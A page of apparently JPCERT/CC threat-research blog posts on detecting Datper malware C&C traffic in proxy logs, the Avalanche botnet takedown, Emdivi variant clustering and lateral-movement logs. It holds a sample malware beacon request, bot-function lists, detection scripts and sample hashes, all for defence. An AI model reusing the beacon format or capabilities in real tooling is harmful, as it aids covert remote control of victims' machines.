
Aug 21, 2017

Detecting Datper Malware from Proxy Logs

This is Yu Nakamura from Analysis Center.

This entry explains the features of Datper, a malware family used in targeted attacks against Japanese organisations, and how to detect it from proxy logs.

JPCERT/CC has been observing attacks using Datper since around June 2016. Research reports on the adversary have been published by LAC [1], SecureWorks [2] and Palo Alto Networks [3]. The adversary has also conducted attacks using Daserf malware in the past, and Symantec refers to the group as “Tick” in its report [4].

Attack vectors

We have confirmed that Datper infection occurs by:

  • Drive-by download attacks
  • Exploiting vulnerabilities in asset management software

In the former attack vector, we observed that a vulnerability in Adobe Flash Player (CVE-2016-7892) was leveraged to download and execute Datper. In the latter, there were cases where devices were also infected with a downloader called “wali”. Analyses of this downloader have been published by Kaspersky [5] and Cybereason [6]. We have seen wali download several types of malware, and Datper is one of them.

Detailed behaviour

Datper communicates with a C&C server over HTTP and operates based on the commands it receives. One of its characteristics is that it only communicates within a specific time window.

Below is a sample HTTP request that Datper sends to a C&C server. The User-Agent string is hard-coded in the malware.


GET /hoge/index.php?fnyup=940785246f0c22b41joikeddfngjokyptui HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: [host name]
Pragma: no-cache
Connection: close

The malware receives a command in the response to the above HTTP request and executes the corresponding function. The functions that Datper can execute are the following:

  • Obtain host names, OS versions etc.
  • Obtain drive information
  • Configure communication intervals
  • Sleep for a set period of time
  • Execute a program
  • Operate on files (Obtain file lists, download, upload, delete)
  • Execute shell commands

After executing these functions, Datper sends the results to a C&C server.

How to detect Datper’s communication

Datper sends HTTP GET requests with two types of query strings, shown as format 1 and format 2 in the following figure.

Figure 1: Query string formats

As shown in Figure 1, <a>, <b> and <c> in the query strings vary for each communication. If the fixed value that follows <c> is “1” (format 1 in the figure), the request asks for commands, while “2” (format 2 in the figure) is used when sending a command execution result to the C&C server. Command execution results are contained in the encrypted data. When the encrypted data is larger than 1024 bytes, the POST method is used instead of GET.

Query strings in this format are typical of Datper’s communication and are rarely observed during normal web browsing. Based on these characteristics, Datper’s communication can be detected by checking for log entries that match the format, that is, strings arranged as <a>=<b><c> where the CRC32 value of <b> matches <c>. For easy verification, the following is an example Python script for checking proxy server logs. The regular expression needs to be modified according to the log format.


import re
import sys
from binascii import crc32

# Matches a URL whose query string has the form <a>=<b><c><1|2>...: <a> is 3 to 8
# alphanumerics, <b> and <c> are 8 hex digits each. Adjust to the proxy log format in use.
filter_1 = re.compile(r'(http://[\da-z\.-]+\.[a-z\.]{2,6}/[\/\w_\.-]+\?[\da-z]{3,8}=([\da-f]{8})([\da-f]{8})[1-2]\S+)\s', re.IGNORECASE)

def main():
    for line in sys.stdin:
        m1 = filter_1.search(line)
        if not m1:
            continue
        url = m1.group(1).lower()   # full matched URL
        d1 = m1.group(2).lower()    # <b>
        d2 = m1.group(3).lower()    # <c>, expected to be CRC32(<b>)
        # crc32() takes bytes on Python 3; the mask keeps the value unsigned on Python 2 as well
        d1_crc32 = "%08x" % (crc32(d1.encode('ascii')) & 0xffffffff)
        if d1_crc32 == d2:
            print("hit: %s" % line.rstrip())

if __name__ == '__main__':
    main()
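The check described above, carried further as an added example that is not part of the original post: it parses Squid-style native access.log lines (a format assumed here), verifies that <c> is the CRC32 of <b>, and distinguishes command requests (“1”) from result uploads (“2”). The log lines, the .invalid host names and the 203.0.113.10 peer address are constructed for the example.

```python
import re
import zlib

# Datper query-string shape: <a>=<b><c><k>..., where <a> is 3 to 8 alphanumerics, <b> and <c>
# are 8 hex digits each, <c> must equal CRC32(<b>), and <k> is "1" (request for commands)
# or "2" (upload of a command execution result).
QUERY_RE = re.compile(
    r"\?(?P<a>[\da-z]{3,8})=(?P<b>[\da-f]{8})(?P<c>[\da-f]{8})(?P<k>[12])(?P<rest>\S*)",
    re.IGNORECASE,
)
KIND = {"1": "command request", "2": "result upload"}


def crc32_hex(text):
    """CRC32 of an ASCII string as 8 lowercase hex digits (masked so it is never negative)."""
    return "%08x" % (zlib.crc32(text.encode("ascii")) & 0xFFFFFFFF)


def classify_url(url):
    """Describe a Datper-style query string, or return None when the URL does not match."""
    m = QUERY_RE.search(url)
    if not m:
        return None
    b, c = m.group("b").lower(), m.group("c").lower()
    if crc32_hex(b) != c:
        # <c> is not CRC32(<b>): ordinary traffic that merely resembles the format
        return None
    return {
        "param": m.group("a"),
        "b": b,
        "crc": c,
        "kind": KIND[m.group("k")],
        "payload_len": len(m.group("rest")),
    }


def scan_squid_log(lines):
    """Scan Squid native access.log lines (assumed field order: time, elapsed, client,
    code/status, bytes, method, URL, ...) and return one record per Datper-style request."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        client, method, url = fields[2], fields[5], fields[6]
        info = classify_url(url)
        if info is None:
            continue
        info.update(client=client, method=method, url=url)
        hits.append(info)
    return hits


# Constructed sample log, not real traffic. Lines 1 and 2 are built so that <c> really is
# CRC32(<b>); line 3 carries a wrong <c>; line 4 is ordinary browsing whose parameter
# happens to be 16 hex digits followed by a "1".
_B1, _B2 = "94078524", "0a1b2c3d"
SAMPLE_LOG = [
    "1503300001.123 210 10.0.0.5 TCP_MISS/200 512 GET "
    "http://c2.example.invalid/hoge/index.php?fnyup=%s%s1joikeddfngjokyptui "
    "- HIER_DIRECT/203.0.113.10 text/html" % (_B1, crc32_hex(_B1)),
    "1503300061.456 330 10.0.0.5 TCP_MISS/200 128 POST "
    "http://c2.example.invalid/hoge/index.php?qwert=%s%s2%s "
    "- HIER_DIRECT/203.0.113.10 text/html" % (_B2, crc32_hex(_B2), "zz" * 10),
    "1503300120.789 180 10.0.0.7 TCP_MISS/200 512 GET "
    "http://c2.example.invalid/hoge/index.php?fnyup=%s000000001abcdef "
    "- HIER_DIRECT/203.0.113.10 text/html" % _B1,
    "1503300180.012 90 10.0.0.9 TCP_HIT/200 4096 GET "
    "http://www.example.invalid/news/list.php?page=0123456789abcdef1 "
    "- HIER_NONE/- text/html",
]

if __name__ == "__main__":
    for hit in scan_squid_log(SAMPLE_LOG):
        print("hit: %(client)s %(method)s %(kind)s param=%(param)s url=%(url)s" % hit)
```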

Change in compression algorithm

As mentioned above, Datper’s communication contains encrypted data. More precisely, the plain text is compressed, encrypted and then encoded. For compression, LZNT1 had been used, but it was replaced with LZRW1/KH around November 2016. Below is the list of compression and encryption methods that Datper uses.

Table 1: List of compression and encryption methods

                               Compression algorithm   Encryption algorithm   Encode algorithm
Datper (until October 2016)    LZNT1                   RC4                    Base64 (alternative table)
Datper (after November 2016)   LZRW1/KH                xor + RC4              Base64 (alternative table)

The adversary has often used LZNT1 in attacks with Datper and other malware families (xxmm/Minzen). While LZNT1 is easy to use through the Windows API “RtlDecompressBuffer”, LZRW1/KH is not available through the Windows API. The reason for this inconvenient choice is unclear; however, this change, together with the slight update to the encryption algorithm, may reflect the adversary’s intention to hinder malware analysis.

Conclusion

The adversary using Datper has conducted targeted attacks against Japanese organisations for a long time, formerly using Daserf malware. Activity with Datper is also likely to continue for a while, and we will continue to watch the malware and its attack activity.

- Yu Nakamura

(Translated by Yukako Uchida)

References

[1] CYBER GRID VIEW Vol.2 | Security Information | LAC Co. Ltd. (Japanese)
    http://www.lac.co.jp/security/report/pdf/20160802_cgview_vol2_a001t.pdf

[2] A whole picture of cyber attacks targeting Japanese companies – BRONZE BUTLER (Japanese)
    https://www.secureworks.jp/%7E/media/Files/JP/Reports/SecureWorksBronzeButlerReport.ashx

[3] “Tick” Group Continues Attacks
    https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/

[4] Tick cyberespionage group zeros in on Japan
    https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

[5] Old Malware Tricks To Bypass Detection in the Age of Big Data – Securelist
    https://securelist.com/blog/research/78010/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/

[6] ShadowWali: New variant of the xxmm family of backdoors | Cybereason
    https://www.cybereason.com/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors/

Appendix A SHA-256 Hash value of Datper Samples

Aug 04, 2017

What the Avalanche Botnet Takedown Revealed: Banking Trojan Infection in Japan

Internet banking services across the globe have been exposed to the threat of unauthorised money transfers and have suffered large-scale losses.

In this landscape, an operation led by international law enforcement agencies has been in effect since November 2016 to capture criminal groups conducting unauthorised online banking transfers and dismantle the attack infrastructure (the Avalanche botnet). JPCERT/CC is one of the many supporters of this operation.

For more information about the operation, please see below:

Europol Press Release:

‘Avalanche’ network dismantled in international cyber operation

https://www.europol.europa.eu/newsroom/news/%E2%80%98avalanche%E2%80%99-network-dismantled-in-international-cyber-operation

Interpol:

‘Avalanche’ network dismantled in international cyber operation

https://www.interpol.int/News-and-media/News/2016/N2016-160

This blog entry presents how JPCERT/CC supports this operation and the current state of malware infection in Japan revealed through our local coordination.

JPCERT/CC’s activities in the operation

Some organizations in support of this operation register domains related to the Avalanche botnet to observe communication between any infected devices and the DNS sinkhole. From all the observed data, CERT-Bund (the National CSIRT of Germany) provides information related to Japanese networks to JPCERT/CC. We then notify administrators of the infected hosts to request investigation and coordination to address the issue.

Characteristics of infected devices in Japan

Figure 1 shows the number of malware-infected hosts linked to the Avalanche botnet observed between 5 December 2016 and 31 May 2017. Note that extreme spikes caused by irregularities, such as dates without any received data, are excluded from the graph.

Figure 1: Number of malware infected hosts in Japan (per day)

In December 2016, when we first received data on the Avalanche botnet, a daily average of about 17,000 hosts was communicating with the DNS sinkhole. By the end of May 2017 this had decreased to about 11,000 hosts per day, thanks to cooperation from our local partners.

In addition, multiple malware families have been observed within the Avalanche botnet. From the data JPCERT/CC received between 5 December and 4 January, the ratio of malware observed in Japan was as follows:

Figure 2: Ratio of malware (linked to the Avalanche botnet) found in infected hosts in Japan

Rovnix, KINS and Shiotob (a.k.a. URLZone, Bebloh) are known as malware that harvests credentials for Internet banking services. We have confirmed that Rovnix and Shiotob were distributed as attachments to spam emails written in Japanese in 2016.

Conclusion

Through this operation, many infected hosts in Japan have been isolated from the botnet, which resulted in the decreasing trends as in Figure 1. However, besides the malware families hosted in the Avalanche botnet, other types of banking trojans such as Ursnif (or DreamBot) have also been distributed recently through spam emails written in Japanese. JPCERT/CC continues to alert local constituents about these threats.

- Shintaro Tanaka

(Translated by Yukako Uchida)

Jul 05, 2017

Clustering Malware Variants Using “impfuzzy for Neo4j”

In a past article, we introduced “impfuzzy for Neo4j”, a tool developed by JPCERT/CC to visualise the results of malware clustering. In this article, we show the result of clustering Emdivi using the tool. Emdivi was seen until around 2015 in targeted attacks against Japanese organisations. For more information about Emdivi, please refer to JPCERT/CC’s report.

Clustering Emdivi with impfuzzy for Neo4j

Emdivi has two major variants - t17 and t20, and we chose the former for this analysis. Figure 1 shows the output of running impfuzzy for Neo4j.

Figure 1: Emdivi t17’s clustering result using impfuzzy for Neo4j

As a result of the analysis, the 90 samples were clustered into 4 types. Figure 2 visualises the clustering results; detailed results are documented in Appendix A. (For detailed instructions on the tool, please see our past blog article.)

Figure 2: Visualised result of Emdivi t17 clustering (Colouring provided for better understanding.)

It stood out that each cluster (Type 1 through Type 4) corresponds closely to the compile date of the malware samples (see Appendix A).

impfuzzy generates a hash of each sample’s Import API table, and that hash is used to calculate similarity. The reason for this clustering therefore cannot be determined from this analysis alone; manual analysis is required to examine what makes the Import APIs differ in each type.

The following sections will describe the reason why Emdivi t17 samples were clustered into 4 types and how the transition occurred from one type to another.

From Type 1 to 2

The clustering results in Appendix A indicate that the transition from Type 1 to 2 occurred around September 2014. We noticed a change in linker versions.

PE files have a header structure called IMAGE_OPTIONAL_HEADER [1]. It contains MajorLinkerVersion and MinorLinkerVersion, which indicate the linker version. Looking at the linker version used when creating Emdivi t17, Type 1 mainly uses 10.0 (Visual Studio 2010) while Type 2 uses 9.0 (Visual Studio 2008). These samples are considered to have been differentiated by the change in linker version, which accordingly changed the Windows APIs that the malware loads.
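An added example, not part of the original article, that reads MajorLinkerVersion and MinorLinkerVersion from a PE image, together with the TimeDateStamp that yields the compile times listed in Appendix A. The header-only image it builds is constructed purely for testing, and the mapping of linker 8.0 to Visual Studio 2005 is added here alongside the two versions named above.

```python
import struct
from datetime import datetime, timezone

# PE/COFF layout used below: e_lfanew at 0x3C in the DOS header points at the "PE\0\0"
# signature, followed by the 20-byte IMAGE_FILE_HEADER and then IMAGE_OPTIONAL_HEADER,
# whose first bytes are Magic (WORD), MajorLinkerVersion (BYTE), MinorLinkerVersion (BYTE).
FILE_HEADER = struct.Struct("<HHIIIHH")  # Machine, NumberOfSections, TimeDateStamp,
                                         # PointerToSymbolTable, NumberOfSymbols,
                                         # SizeOfOptionalHeader, Characteristics
OPT_PREFIX = struct.Struct("<HBB")       # Magic, MajorLinkerVersion, MinorLinkerVersion

# Linker major version to toolchain (8.0 = Visual Studio 2005 is the added mapping).
VS_BY_LINKER = {8: "Visual Studio 2005", 9: "Visual Studio 2008", 10: "Visual Studio 2010"}


def read_pe_header_fields(data):
    """Return (linker_version, compile_time_utc, pe_format) from a PE image's headers.
    Raises ValueError when the bytes do not look like a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    fh = FILE_HEADER.unpack_from(data, e_lfanew + 4)
    timestamp, size_of_opt = fh[2], fh[5]
    if size_of_opt < OPT_PREFIX.size:
        raise ValueError("optional header too short")
    magic, major, minor = OPT_PREFIX.unpack_from(data, e_lfanew + 4 + FILE_HEADER.size)
    pe_format = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)
    if pe_format is None:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    compile_time = datetime.fromtimestamp(timestamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    return "%d.%d" % (major, minor), compile_time, pe_format


def describe(data):
    """One-line summary in the style of the Appendix A columns."""
    linker, compiled, fmt = read_pe_header_fields(data)
    toolchain = VS_BY_LINKER.get(int(linker.split(".")[0]), "unknown toolchain")
    return "%s, linker %s (%s), compiled %s UTC" % (fmt, linker, toolchain, compiled)


def build_pe_stub(major, minor, timestamp, magic=0x10B):
    """Constructed header-only PE image for testing; it is not a runnable executable."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)  # 64-byte DOS header
    size_of_opt = 224 if magic == 0x10B else 240
    file_hdr = FILE_HEADER.pack(0x014C, 3, timestamp, 0, 0, size_of_opt, 0x0102)
    opt_hdr = OPT_PREFIX.pack(magic, major, minor) + b"\x00" * (size_of_opt - OPT_PREFIX.size)
    return dos + b"PE\x00\x00" + file_hdr + opt_hdr


if __name__ == "__main__":
    # 1420070400 is 2015-01-01 00:00:00 UTC, a constructed timestamp
    for maj, mn in ((10, 0), (9, 0)):
        print(describe(build_pe_stub(maj, mn, 1420070400)))
```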

From Type 2 to 3

Type 2 changed to Type 3 around November 2014, and this transition reflects a change in the method of loading Windows APIs. Usually, a PE file loads Windows APIs upon execution by specifying the API names in the Import Name Table (INT) inside the PE header. (Please refer to a past blog article for more information.)

However, Type 3 samples hold some Windows API names in obfuscated form and resolve them only when the API is about to be used. Figure 3 shows the result of decoding the obfuscated strings in Emdivi t17, which indicates that Type 3 contains some obfuscated Windows API names (marked in red).

Figure 3: Comparison of decoded strings in Emdivi t17 clustered as Type 2 and 3

The Windows APIs obfuscated in Type 3 are absent from its INT. This means that the Windows APIs the malware intends to execute cannot be identified by looking at the INT alone.

This change in the Windows API loading method is thought to be the reason for the difference between Type 2 and 3.

From Type 3 to 4

The transition from Type 3 to 4 occurred around May 2015. This is due to a new bot (remote control) function being added. Here is the list of bot functions that Type 4 has; “GOTO” is the function new to Type 4.

  • GOTO
  • DOABORT
  • DOWNBG
  • GETFILE
  • LOADDLL
  • SETCMD
  • SUSPEND
  • UPLOAD
  • VERSION

The added bot function resulted in new Windows APIs being used, which distinguishes Type 4 from 3.

Summary

It is not practical to manually analyse a large number of malware samples; it is important to automate the malware clustering process in order to find new types of malware and changes in malware features. With this analysis, we demonstrated an example of effective malware analysis using impfuzzy for Neo4j by focusing on samples with different features. The tool is available on GitHub, and we hope it helps your malware analysis.

- Shusei Tomonaga

(Translated by Yukako Uchida)

Reference

[1] Microsoft: IMAGE_OPTIONAL_HEADER structure

Appendix A Emdivi t17 Clustering Results
Table 1: List of Emdivi t17 Clustering Results
No. Compile Time EmdiviVersion LinkerVersion Type SHA256
1 2013-11-21 17:00:52 t17.08.2 10.0 1 6b0192ec4f0290c0c00517eeb75648e340dacc58189d9d6adee844283cda4a5f
2 2013-12-24 12:13:21 t17.08.2 10.0 1 c162df8761e09c95160e9d432d310a4673d53615c2ff837a1a6f322e45038180
3 2014-01-06 11:33:48 t17.08.2 10.0 1 bf8cba80f4d80e13f11c8231477f0b96c3a9e9abc8da798e6cede052f6801aa8
4 2014-01-06 11:48:05 t17.08.2 10.0 1 742c70238ea0b2b0a1d66660913b18deaff2af35c6dc5b19e9d2158249cae433
5 2014-01-19 16:12:41 t17.08.2 10.0 1 18dfb3ff38c802f54c66c7d06380e7aff4834ac7a0c9ea35e50f46cf40266c3a
6 2014-01-21 12:29:03 t17.08.2 10.0 1 08a542fe7f8450d2c66b5e428872860d584bc5be714a50293a10aef415310fe8
7 2014-01-21 20:07:01 t17.08.2 10.0 1 bf9229b342c144970358308ccb017802cb2ff5c2086bf0367d9d72f34556b7c1
8 2014-01-23 16:32:01 t17.08.2 10.0 1 2bf87ec696356a685b081b9e0aec88c3ac3e3353927f712e978db0d2f5a9476b
9 2014-02-28 10:52:43 t17.08.5 10.0 1 396c7766eb8873227c270eae2b13357dbcd68fa7f07053dd280375418eeee614
10 2014-03-13 13:05:13 t17.08.9 10.0 1 138e7c2e5cf0caba02d005752686a66482df23f4b4b648f446f2afada32a5750
11 2014-04-01 12:08:03 t17.08.9 10.0 1 4df19e155cac0735500cffae49007b3d971979cccca779a5af685db489b4b042
12 2014-05-07 13:52:46 t17.08.10 10.0 1 b97ab11d1154fae07d2cfab055cdc6b745a5117fc1d8e557f6a244040ba7cce3
13 2014-05-08 12:22:24 t17.08.10 10.0 1 04b9a6ef5ef6cdaf42e90431039bd56b68082c5056889cf4b9ababc6e0834b56
14 2014-05-11 15:44:46 t17.08.9 10.0 1 83620f29a19a4d372e256d98ebfd2d3e5cb4b8db97b385c2942914298b8d2870
15 2014-06-03 10:41:46 t17.08.9 10.0 1 4422d1568f729c316e8d02a35fe147c4c36c91d650989e9ac3caa6fbbc086b37
16 2014-07-17 10:48:24 t17.08.9 10.0 1 e7ae0995e3d4dd9c3fed51d5bca73ea9fa3edd90e2e87fc0cfac58165afdf4e8
17 2014-07-22 17:40:31 t17.08.9 10.0 1 7875c21473cf5f8d936f1335c049ae6df9e0b0574b263060d7a526f3d53cbf07
18 2014-07-28 18:01:59 t17.08.16 10.0 1 c805af2204c1d8612cd929b93fc5c38a448a03561d410d7a198c313553e47e39
19 2014-08-04 13:57:34 t17.08.16 10.0 1 3243925baa06dc69731da91da49242fd73aea38afe46e171708de4ecd4e53b80
20 2014-08-05 12:51:43 t17.08.18 8.0 1 92860e0a9e7dc49c43a0db87d4fb345294000ac3191af1dc6d702b89628c97eb
21 2014-08-06 09:22:32 t17.08.16 10.0 1 df97dd9607f0fdcc10f9ba99e6c3d01eb8453ceeeab840ef6b965458e24485bc
22 2014-08-12 18:09:41 t17.08.16 10.0 1 d26eb51e2787353b18c8f290f0710510423e3925a796697ff15aafd14fea6f2d
23 2014-08-18 12:21:10 t17.08.16 10.0 1 37f43f9c4298dc41f6b1ed03396cc1f7da664ed25e97c4263e6c360f59f3a51b
24 2014-08-19 20:01:29 t17.08.16 8.0 1 9fc76d0fb4f01819c0d9af09a0357dab6c33a4d5f6e41cafebeb9ef7ae35c99e
25 2014-09-09 13:34:21 t17.08.18 9.0 2 f017218f05d225cdb62f3081c4dac4b09a3fb2b93c01096bd4141b67d3eb3bbf
26 2014-09-18 09:26:42 t17.08.18 9.0 2 139e22abe7aaec635e2b570935636c4894a19a7b284516b77f190b78a369c4d6
27 2014-09-22 09:51:33 t17.08.18 9.0 2 a00e37d1d3fe990ebac26a4805a7ab42bd1dcf7ef65f151906204eee7b0c71fd
28 2014-09-25 10:34:10 t17.08.18 9.0 2 3d084155e6f79b45acba165cd4a17a3bed42daba478c14a795dc2c2809f302b6
29 2014-09-28 20:52:36 t17.08.18 9.0 2 196364b3e78add557b6f0471fb32061468bb2b20e16acd1a7686122234c984a7
30 2014-09-30 12:10:55 t17.08.21 9.0 2 8c3666940afd65835e4251fbd14942d210323d46adf57c5e8f29b61d552fd386
31 2014-10-07 11:50:57 t17.08.21 9.0 2 878937da134339ccd8c6bbc5ac020472c20a42fb1f07b56152cfcc1656077d62
32 2014-10-08 18:31:01 t17.08.21 9.0 2 b99f08be6a476d359820c48345ddf4f2f0fcc1ca041f3630680635c675a1d7be
33 2014-10-21 15:13:53 t17.08.21 9.0 2 1209d8b3c83c72df781b805a2c17a0939c841384aadc32e4e9005536a3bba53f
34 2014-10-24 17:16:08 t17.08.21.3 9.0 2 c89823eba2bdcdfcae33b33fb358154debe3fd88c75c684aa6b510e2d4b3ca53
35 2014-10-27 10:29:00 t17.08.21 9.0 2 884cbc1f0e70efae4815127bda7bab50883a707581d9d4061d268249c154ff2d
36 2014-10-28 12:48:54 t17.08.21 9.0 2 682b6c9d468e8d0ab8b5d4080cecf52a9dd66b59b99936a4941b8190c5f3fff9
37 2014-11-04 19:15:32 t17.08.23 9.0 3 23449109f0d4b07fd8010bb36b3b1084b48d5ac515725b68bf32322b4902397e
38 2014-11-05 21:15:57 t17.08.23 9.0 3 a79cfba79489d45a928ef3794d361898a2da4e1af4b33786d1e0d2759f4924c3
39 2014-11-05 22:00:42 t17.08.23 9.0 3 9801caaf44ce9a6be3f497e706f5b71dcc7c50351374c33dc2c9fcbb55f55e05
40 2014-11-06 13:55:46 t17.08.23 9.0 3 b19a233b07a1342f867aef1b3fb3e473b875bd788832bb9422cacb5df1bda04e
41 2014-11-13 10:52:56 t17.08.23 10.0 1 6c4c3bc7b0dfe531790bfb023b141c23f3c17a9971fed704d1b46e43f97d41c1
42 2014-11-13 11:34:31 t17.08.23 10.0 1 21a51f69d08aaf0aaaeb5b8413bb710c1727d9d08a9a1f46883f6f93691e0870
43 2014-11-14 13:10:40 t17.08.25 9.0 3 28a774235865924a7fec405aaf6463164a03f6e646c9fd964c3191304e59d35b
44 2014-11-18 11:56:13 t17.08.25 9.0 3 29a480579353c85e48b996ebc38cad9313ad6b9e495a3a69bf1519837acab04f
45 2014-12-08 15:19:29 t17.08.25 9.0 3 34bc147423f565bf38100913d25f85057e252755eef622abc1b788d511caf605
46 2014-12-11 18:28:38 t17.08.25 9.0 3 a188b87e495e4b0aad0d0595987677f9758479b120fb2ed3a04fba308a66830a
47 2014-12-16 18:13:13 t17.08.25 9.0 3 e39b1b36a5da4ad0f9c103478ab469b13a0528540ddbd1679eb24349a6726dbf
48 2014-12-24 10:37:26 t17.08.25 9.0 3 037b0dbfc2643a4a4779f6e3a8e5c8c41cbcd64533d2245c9a26dfd1d4f55dd8
49 2015-01-12 11:58:46 t17.08.25 9.0 3 9e74825e251a4f4cef9bc98273082f3b58695a224b1ed16ba6dedaa4c154cb21
50 2015-01-20 11:10:12 t17.08.26 9.0 3 5e221bd0eef231b7a948d8f6a2f660f8d6685cf2711fe50311485227ebcf9e51
51 2015-01-20 11:59:37 t17.08.26 9.0 3 635b43f7c0508f5e2cbf26f81daf0a730a0f0b06303c54c747b780f91430bb7f
52 2015-01-22 11:25:49 t17.08.26 9.0 3 efa57d43145de9a1e3c7541f94837a9c7b76d604b779d9847637d4a55b1ee723
53 2015-01-22 16:06:33 t17.08.26 9.0 3 9ace48ecef568bb9f5ccd462ca3efb4c2fbc15f0316323f1729e88cbe184158d
54 2015-01-23 10:14:46 t17.08.26 9.0 3 42e6b7afe4da672ab9bf647e73201135b3faf2121b629612b35307dc0d8698e4
55 2015-01-26 10:15:10 t17.08.26 9.0 3 9ebef65f00fc6ad70f591f7fb1f39f0f6b1766ff3fd9f47693ce669e70f84abb
56 2015-02-03 11:35:23 t17.08.26 8.0 3 6aed51b108d9f9f197842e17b0f58d4dec3709ca1eae4d42146d0bba0c145eaf
57 2015-03-02 10:18:13 t17.08.27 9.0 3 f6fce0464f1ad8044092e6812bdfb8545e1df5ee23aba828b4dcb86fb6d0e62b
58 2015-03-04 13:08:13 t17.08.27 9.0 3 fca765c535d1870d71ee152e5b004e73515ade1ee1c9a512a0858a508380465d
59 2015-03-05 12:59:51 t17.08.27 9.0 3 eac8441227077edb28adf096c5493710e2ca1978f4e4c4b2b93d481cd482d890
60 2015-03-17 12:50:29 t17.08.27 9.0 3 9f66ad282373b8b0df45dd32723dcdfcd4821e22cba4912678c3c8632e722730
61 2015-03-19 16:03:19 t17.08.27 9.0 3 77fa012060884d17eea1e54d97176a7a88c499f03315dfd602c1e1e17e556ede
62 2015-03-20 11:44:49 t17.08.27 9.0 3 3cade660e227faadad0060d793b69cb778842a514ac6996bc6aaddb6a055f445
63 2015-03-20 13:04:19 t17.08.27 9.0 3 6c3b955ad677ff26428d95a35b3a22ca3d523265674f08b6a0b59df270e6bf19
64 2015-03-24 13:07:23 t17.08.27 9.0 3 400a08b4a067b1e2fb3bee509bf933a746cf3ef2d000bb3181c7176344641a01
65 2015-04-22 12:29:48 t17.08.29 9.0 3 e3a2d62a997d4e9ee581fd86d312ac34caddd3165c07ca30c6741b4c21088d08
66 2015-04-24 12:07:43 t17.08.29 10.0 1 782b3bed336eab77a49df51e697bc64d830f7f11a32ff49abc599fe5b074e0b9
67 2015-05-20 12:52:28 t17.08.30 9.0 4 e03e6f7d98b214b5051b7484e4099ce5bd8c46e49faf44002c8ba146977127ef
68 2015-05-21 16:38:39 t17.08.30 9.0 4 28426751f30de4091dee898c70f49ec2ece607b6b642b45f5dcd9ae73ac38739
71 2015-05-22 12:51:18 t17.08.30 9.0 4 09178fa9c4be32982619a183b8b76bfc2ff57486aac04c8fed654a4d9fe91436
69 2015-05-22 12:51:18 t17.08.30 9.0 4 cb3976965f2105492193889f3f58f2ef2ccfeb8604e2b9448055ec6608d4aa85
70 2015-05-22 12:51:18 t17.08.30 9.0 4 de8759fe34eb2f395574be79479832402aa4d113e102d6945df493abee3d8b34
72 2015-05-28 13:48:14 t17.08.30 9.0 4 05ef4e0de8d57e6cd10d1673fcfca9c03b6e9a271d54028781e96235c4530e15
73 2015-06-02 12:15:26 t17.08.30 9.0 4 07b7041016c16341ea1f35a8c5fb5312d15f089ed5e925f78ffdd2568a8cf17c
74 2015-07-06 11:34:56 t17.08.31 9.0 4 c59ebe1fa6abe52c85f5f56a7da810a35e44c4772746bc829fa7d9e4e6a59477
75 2015-07-10 09:40:15 t17.08.31 9.0 4 3e850306025c231f09fa1922d1bb8e1a40bd8acc142d92219d9e9c8f8911b77d
76 2015-07-10 10:58:16 t17.08.31 9.0 4 008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e
77 2015-07-13 01:23:13 t17.08.31 9.0 4 e919ae6a3bdc6abe6b695215a53b74072a39b86757e049f930866b3f69000957
78 2015-07-13 11:46:27 t17.08.31 9.0 4 567fa6bf28862ce7d14a2f3cf5b718780213fa3ee73f59557c29525f8daa200c
79 2015-07-14 10:57:44 t17.08.31 9.0 4 a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d
80 2015-07-14 11:16:54 t17.08.31 9.0 4 5a30f9010a316cc74ed271e732741c6d5d38f0e1c6f3b547176adcd40cb547ae
81 2015-07-14 18:44:14 t17.08.31 9.0 4 bfcd987ca3e79bd7ba8dde95a392dbba02ffa30242954a0cfa35ec81182f0cc8
82 2015-07-16 10:10:07 t17.08.31 9.0 4 3caf60dd3bb551d4da244dffaeb68fe01b59cd19bd0f0509611b706048b3382f
83 2015-07-28 13:56:35 t17.08.31 9.0 4 280371475442917b782f6a834003313f3aa0e5bb65f0acac5aab673d04336ba4
84 2015-08-05 09:51:31 t17.08.31 9.0 4 3cebf71221af741ea0b0883b45c092f900b513de3a004f81d3c595648311b7e9
85 2015-08-07 10:23:11 t17.08.34 8.0 4 90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86
86 2015-08-13 09:48:01 t17.08.34 8.0 4 6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662
87 2015-08-13 10:35:15 t17.08.34 8.0 4 17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24
89 2015-08-19 10:16:01 t17.08.34 8.0 4 22957429e8ab527ff8bb45fbc50aa8400ea643a68de8d43da3fee3239e2159d4
88 2015-08-19 10:16:01 t17.08.34 8.0 4 3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1
90 2015-10-13 10:52:52 t17.08.34 8.0 4 e68e835904aaef2da5b38e9532036117996d58d3fba05cbe454f9d418be60ef4

Jun 12, 2017

Research Report Released: Detecting Lateral Movement through Tracking Event Logs

JPCERT/CC has been seeing a number of APT intrusions where attackers compromise a host with malware and then move laterally inside the network in order to steal confidential information. For lateral movement, attackers use tools downloaded onto infected hosts as well as Windows commands.

In incident investigation, traces of tool and command executions are examined through logs. For an effective investigation, a reference describing the logs recorded upon tool and command execution would be useful.

JPCERT/CC conducted research on typical tools and commands that attackers use after intrusion, and on the traces they leave on Windows when executed. The result of the research is available in the report below:

Detecting Lateral Movement through Tracking Event Logs

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

